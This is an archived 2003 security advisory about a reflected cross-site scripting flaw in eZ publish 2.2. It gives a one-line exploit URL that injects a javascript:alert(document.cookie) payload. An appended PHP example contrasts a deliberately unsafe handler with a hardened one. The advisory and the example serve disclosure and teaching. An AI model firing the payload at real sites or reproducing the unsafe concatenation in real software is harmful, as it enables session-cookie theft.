------------------------------------------------------
EzPublish "Directory" XSS Vulnerability
------------------------------------------------------

------------------------------------------------------
About Ezpublish;
------------------------------------------------------
PHP Based Content Management System
Vendor : http://ez.no
Demo : http://publishdemo.ez.no/

------------------------------------------------------
Vulnerable;
------------------------------------------------------
eZ publish 2.2

------------------------------------------------------
Not Vulnerable;
------------------------------------------------------
eZ publish 3

------------------------------------------------------
Vendor Status;
------------------------------------------------------
Vendor replied and sent a new version of this file (attached).

------------------------------------------------------
Patch;
------------------------------------------------------
You can download the patched file in the attachment.

------------------------------------------------------
Exploit;
------------------------------------------------------
http://[victim]/index.php/article/articleview/[img%20src="javascript:alert(document.cookie)"]

(Replace [ ] with < >)

Ferruh Mavituna
Web Application Security Consultant
Freelance Developer & Designer
http://ferruh.mavituna.com
ferruhat_private
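
Added example, not part of the original advisory and not eZ publish source code: a minimal PHP model of a handler that reflects the path segment after /article/articleview/ into its response, shown beside a hardened form that type-checks the segment and HTML-encodes it on output. The function names and the error-page markup are hypothetical; the sample path is constructed from the URL shape in the advisory.

```php
<?php
// Hypothetical handler for /index.php/article/articleview/<id>.
// Not eZ publish code; names and markup are assumptions for illustration.

// Return the segment that follows /article/articleview/ in PATH_INFO.
// PATH_INFO is assumed to arrive already percent-decoded by the web server.
function articleSegment(string $pathInfo): string
{
    $parts = explode('/', trim($pathInfo, '/'), 3);
    if (count($parts) < 3 || $parts[0] !== 'article' || $parts[1] !== 'articleview') {
        return '';
    }
    return $parts[2];
}

// Vulnerable pattern: the raw path segment is concatenated into HTML.
function renderNotFoundUnsafe(string $segment): string
{
    return '<p>Article ' . $segment . ' was not found.</p>';
}

// Hardened pattern: allow-list the expected type (digits only), and
// HTML-encode anything that is echoed back, including in the error branch.
function renderNotFoundSafe(string $segment): string
{
    if (!ctype_digit($segment)) {
        $shown = htmlspecialchars($segment, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
        return '<p>Invalid article id: ' . $shown . '</p>';
    }
    return '<p>Article ' . (int) $segment . ' was not found.</p>';
}

// Constructed input: the advisory's path with [ ] replaced by < >.
$path = '/article/articleview/<img src="javascript:alert(document.cookie)">';
$seg  = articleSegment($path);

echo renderNotFoundUnsafe($seg), "\n"; // segment is emitted as live markup
echo renderNotFoundSafe($seg), "\n";   // segment is emitted as encoded text
echo renderNotFoundSafe('42'), "\n";   // numeric id passes the type check
```

The type check alone would block this input, but the output encoding is what keeps any other reflected value from being parsed as markup.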
This archive was generated by hypermail 2b30 : Fri May 16 2003 - 08:58:35 PDT